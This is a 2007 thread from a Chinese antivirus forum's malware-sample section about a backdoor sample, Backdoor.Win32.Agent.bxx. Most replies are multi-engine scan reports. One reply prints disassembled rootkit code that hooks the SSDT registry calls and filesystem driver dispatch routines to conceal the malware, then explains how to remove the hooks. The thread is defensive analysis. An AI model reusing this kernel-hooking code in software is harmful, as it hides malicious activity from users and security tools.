收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 Backdoor.Win32.Agent.bxx,[2a31d4]
12下一页
返回列表 发新帖
查看: 2840|回复: 13
收起左侧

[病毒样本] Backdoor.Win32.Agent.bxx,[2a31d4]

[复制链接]
绅博周幸
发表于 2007-10-4 16:03:52 | 显示全部楼层 |阅读模式
a-squared3.0.0.1232007.10.032007-10-03-
19.308
AntiVir7.6.0.187.0.0.462007-10-03-
8.428
Arcavir1.0.42007100320122007-10-03-
4.777
AVAST1.0.8000778-22007-10-03-
6.909
AVG7.5.49.442269.13.37/10422007-10-01Packed.AverCrypt
5.277
BitDefender7.60825.8982407.151062007-10-04-
11.248
CA (VET)8.4.0.2431.2.51852007-10-04-
14.079
ClamAV 0.91.244622007-10-04-
0.028
Comodo2.112.0.0.3032007-09-04-
18.211
Dr.WEB4.332007.10.032007-10-03BackDoor.Bulknet.77
24.876
ewido4.0.0.22007.10.032007-10-03-
9.691
F-PROT4.4.0.50200709302007-09-30-
7.342
F-SECURE5.51.61002007.10.04.012007-10-04Backdoor.Win32.Agent.bxx
8.257
IKARUST3.1.1.122007.10.03.696122007-10-03suspicious(level 100)
1.918
MKS_VIR2.012007.10.032007-10-03-
6.735
NOD322.70.1025702007-10-03-
0.028
NORMAN5.91.085.902007-10-03-
18.093
nProtect2007-10-04.009628322007-10-04-
41.879
QuickHeal9.002007.10.032007-10-03-
4.283
SOPHOS2.49.14.212007-10-04-
9.254
The Hacker6.2.6v000762007-10-02-
8.320
VBA323.12.2.420071003.05092007-10-03-
3.109
ViRobot200710022007.10.022007-10-02-
1.122
VirusBuster4.3.19:99.107.6/11.02007-10-03-
3.585
卡巴斯基5.5.102007.10.042007-10-04Backdoor.Win32.Agent.bxx
0.041
江民杀毒10.00.6502007.09.302007-09-30-
1.531
熊猫卫士9.04.03.00012007.10.032007-10-03Suspicious file
9.986
瑞星19.019.43.20.002007-10-03-
2.149
赛门铁克1.3.0.2420071003.0352007-10-03-
4.508
趋势8.500-10014.755.002007-10-02-
0.044
迈克菲5.2.0051332007-10-03-
3.004
金山毒霸2007.6.20.2492007.10.42007-10-04-
2.369
飞塔2.81-3.118.1832007-10-03Suspicious
0.998

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

woai_jolin
发表于 2007-10-4 16:04:39 | 显示全部楼层
扫描报告
2007年10月4日 16:04:35 - 16:04:35
计算机名称: C3EF58622174424
扫描类型: 扫描目标
目标: G:\V\zhelatin.exe


--------------------------------------------------------------------------------

结果: 找到 1 恶意软件
Backdoor.Win32.Agent.bxx (病毒)
G:\V\zhelatin.exe 操作: 删除




--------------------------------------------------------------------------------

统计信息
已扫描:
文件: 1
未扫描: 0
结果:
病毒: 1
间谍软件: 0
可疑项目: 0
危险软件: 0
操作:
已杀毒: 0
已重命名: 0
删除: 1
已隔离: 0
失败: 0
启动扇区:
已扫描: 0
受感染: 0
可疑项目: 0
已杀毒: 0


--------------------------------------------------------------------------------

选项
定义版本:
病毒: 2007-10-04_01
间谍软件: 2007-10-04_01
扫描引擎:
F-Secure AVP: 7.00.171, 2007-10-04
F-Secure Libra: 2.04.01, 2007-10-03
F-Secure Orion: 1.02.37, 2007-10-03
F-Secure Draco: 1.00.35, 2007-09-17
扫描选项:
扫描所有文件
扫描内部存档
操作:
病毒: 删除受感染文件
间谍软件: 扫描后询问
回复

举报

king6808
发表于 2007-10-4 16:19:38 | 显示全部楼层
检测到:木马程序 Backdoor.Win32.Agent.bxx        URL: http://bbs.kafan.cn/attachment.p ... n.exe//PE-Crypt.PNH
回复

举报

FBAV
发表于 2007-10-4 16:20:03 | 显示全部楼层
MicroVita AntiSpyware  
_____________________________________________
                                          
             风暴微塔反间谍
[强力查杀各种Win32位的病毒,木马,蠕虫,恶意软件]                  
                   http://221.10.254.214/
----------------------------------------------
开始扫描……

[C:\Documents and Settings\Administrator\桌面\Virus\alqq\zhelatin.exe]
                    …………发现Spy!报告:[1]
文件信息:  大小:21504  MD5:2a31d4a4e18960715a21d5f0480654b3

OK  扫描完毕!

[ 本帖最后由 FBAV 于 2007-10-4 16:25 编辑 ]
回复

举报

liulzj02
发表于 2007-10-4 16:25:36 | 显示全部楼层
瑞星不报,费尔报
回复

举报

taihuxian
发表于 2007-10-4 16:51:50 | 显示全部楼层
卡巴斯基反病毒软件 7.0

The requested URL http://bbs.kafan.cn/attachment.php?aid=135205 is infected with Backdoor.Win32.Agent.bxx virus
回复

举报

IllusionWing
发表于 2007-10-4 16:55:04 | 显示全部楼层
UGuard Log (Digital Fox - gankeyu@126.com)
UGuarduu.exe = 4.2.0
HC0.rlb = 2.8.9
HC2.rlb = 2.4.0
FN0.rlb = 2.3.1
扫描选项:扫描档案, 扩展, 忽略非活动, 忽略大文件, nFile, BAT模拟, 捆绑检测, 变形壳, 启发,
[扫描] [Level 2] 在 E:\Documents and Settings\Administrator\桌面\Vir\zhelatin.exe 检测到 Backdoor.Agent.bxx
[扫描] [Level 2] 在 E:\Documents and Settings\Administrator\桌面\Vir\zhelatin.zip>>zhelatin.exe 检测到 Backdoor.Agent.bxx
任务 扫描 完成。共耗费的时间:0-00-00 00:00:00:0125,共扫描的文件数量:3,共扫描到的威胁数量:2,威胁率:0.66666667
回复

举报

人浪流涯天
头像被屏蔽
发表于 2007-10-4 18:15:29 | 显示全部楼层
修改系统服务分发表原生api函数地址拦截与注册表相关的五条系统服务,挂钩fastfat.sys/ntfs.sys从个而使无法找到病毒

sub_1286E proc near

var_4= dword ptr -4

mov        edi, edi
push       ebp
mov        ebp, esp
push       ecx
cli
mov        eax, cr0
mov        [ebp+var_4], eax
and        eax, 0FFFEFFFFh
mov        cr0, eax
mov        ecx, ds:KeServiceDescriptorTable
mov        ecx, [ecx]
mov        eax, ds:ZwOpenKey
mov        eax, [eax+1]
mov        dword ptr [ecx+eax*4], offset loc_12192
mov        ecx, ds:KeServiceDescriptorTable
mov        ecx, [ecx]
mov        eax, ds:ZwEnumerateKey
mov        eax, [eax+1]
mov        dword ptr [ecx+eax*4], offset loc_1224A
mov        ecx, ds:KeServiceDescriptorTable
mov        ecx, [ecx]
mov        eax, ds:ZwEnumerateValueKey
mov        eax, [eax+1]
mov        dword ptr [ecx+eax*4], offset loc_12412
mov        ecx, ds:KeServiceDescriptorTable
mov        ecx, [ecx]
mov        eax, ds:ZwSetValueKey
mov        eax, [eax+1]
mov        dword ptr [ecx+eax*4], offset loc_125DA
mov        ecx, ds:KeServiceDescriptorTable
mov        eax, ds:ZwDeleteValueKey
mov        eax, [eax+1]
mov        ecx, [ecx]
mov        dword ptr [ecx+eax*4], offset loc_12730
mov        eax, [ebp+var_4]
mov        cr0, eax
sti
leave
retn



sub_11CB8 proc near

DestinationString= UNICODE_STRING ptr -8
arg_0= dword ptr     8

mov        edi, edi
push       ebp
mov        ebp, esp
push       ecx
push       ecx
push       ebx
push       esi
mov        esi, [ebp+arg_0]
mov        eax, esi
xor        ebx, ebx
sub        eax, ebx
push       edi
jz         short loc_11CD7

dec        eax
jnz        short loc_11CE6

offset s_FilesystemFas ; "\\FileSystem\\Fastfat"
jmp        short loc_11CDC

??觲L /
loc_11CD7:                 ; "\\FileSystem\\Ntfs"
push       offset s_FilesystemNtf

loc_11CDC:
lea        eax, [ebp+DestinationString]
push       eax                ; DestinationString
call       ds:RtlInitUnicodeString


loc_11CE6:
mov        eax, ds:IoDriverObjectType
mov        edi, esi
shl        edi, 2
lea        esi, dword_12E44[edi]
push       esi
push       ebx
push       ebx
mov        [esi], ebx
push       dword ptr [eax]
lea        eax, [ebp+DestinationString]
push       ebx
push       ebx
push       40h
push       eax
call       ds:ObReferenceObjectByName
cmp        eax, ebx
jl         short loc_11D4F

cli
mov        eax, cr0
mov        [ebp+arg_0], eax
and        eax, 0FFFEFFFFh
mov        cr0, eax
mov        ecx, [esi]
mov        eax, offset loc_11A06
add        ecx, 38h
xchg       eax, [ecx]
mov        ecx, [esi]
mov        dword_12E1C[edi], eax
mov        eax, offset word_11AF2
add        ecx, 68h
xchg       eax, [ecx]
mov        dword_12E30[edi], eax
mov        eax, [ebp+arg_0]
mov        cr0, eax
sti
xor        eax, eax


loc_11D4F:
pop        edi
pop        esi
pop        ebx
leave
retn       4
sub_11CB8 endp

连驱动都没有放出来就被微点拦截了,苦命的娃

Rootkit解除方法,直供解除该病毒Rootkit右键选择修复函数入口地址,不要用全部修复,否则在安装主防类型杀软的情况下会造成系统崩溃
把函数地址在Runtime2.sys全部修复,该后门Rootkit就解决了,其他就没有什么技术含量了

[ 本帖最后由 人浪流涯天 于 2007-10-4 18:19 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

a256886572008
发表于 2007-10-4 18:42:56 | 显示全部楼层

















回复

举报

mofunzone
发表于 2007-10-4 22:45:18 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Users\morgan\Documents\zhelatin.zip'
C:\Users\morgan\Documents\
  zhelatin.zip
    [0] Archive type: ZIP
    --> zhelatin.exe
        [DETECTION] Contains a detection pattern of the (dangerous) backdoor program BDS/Agent.bxx.12 Backdoor server programs
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-18 15:25 , Processed in 0.138438 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表